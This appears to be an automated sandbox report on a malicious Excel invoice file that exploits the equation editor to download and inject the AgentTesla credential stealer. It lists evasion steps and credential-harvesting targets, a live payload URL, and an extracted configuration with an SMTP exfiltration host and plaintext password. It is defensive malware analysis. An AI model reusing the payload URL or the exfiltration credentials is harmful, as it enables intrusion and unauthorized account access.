HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00263BA0	6_2_00263BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00268C30	6_2_00268C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0026F488	6_2_0026F488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_0026BFA8	6_2_0026BFA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_002647B8	6_2_002647B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00263EE8	6_2_00263EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00462150	6_2_00462150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00466F20	6_2_00466F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_00469928	6_2_00469928

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Fatura 002.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/5@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Fatura 002.xlam.xlsx

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR87F3.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Fatura 002.xlam.xlsx	Virustotal: Detection: 50%
Source: Fatura 002.xlam.xlsx	ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: Fatura 002.xlam.xlsx

Initial sample: OLE indicators vbamacros = False

PE file contains an invalid checksum

Source: food[1].exe.2.dr	Static PE information: real checksum: 0xa2135 should be: 0x120c6d
Source: coolz.exe.2.dr	Static PE information: real checksum: 0xa2135 should be: 0x120c6d

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 6_2_00267988 push esp; ret

6_2_00267995

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to dropped file

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

API/Special instruction interceptor: Address: 362D6CC

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3544

Thread sleep time: -360000s >= -30000s

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03670754 mov edx, dword ptr fs:[00000030h]

2_2_03670754

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\coolz.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior

Source: coolz.exe, 00000005.00000000.472546872.0000000000482000.00000002.00000001.01000000.00000004.sdmp, food[1].exe.2.dr, coolz.exe.2.dr

Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000006.00000002.622210442.0000000002001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622128316.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.35.109	menyos.com	United States		13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
menyos.com	104.21.35.109	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://menyos.com/assets/home/js/bdg/food.exe	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Fatura 002.xlam.xlsx

Avira: detected

Found malware configuration

Source: 6.2.RegSvcs.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.solucionesmexico.mx", "Username": "security@solucionesmexico.mx", "Password": " Qdk,[nKrmI0j "}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Fatura 002.xlam.xlsx	Virustotal: Detection: 50%			Perma Link
Source: Fatura 002.xlam.xlsx	ReversingLabs: Detection: 71%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\coolz.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: /log.tmp
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>[
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ]<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <br>
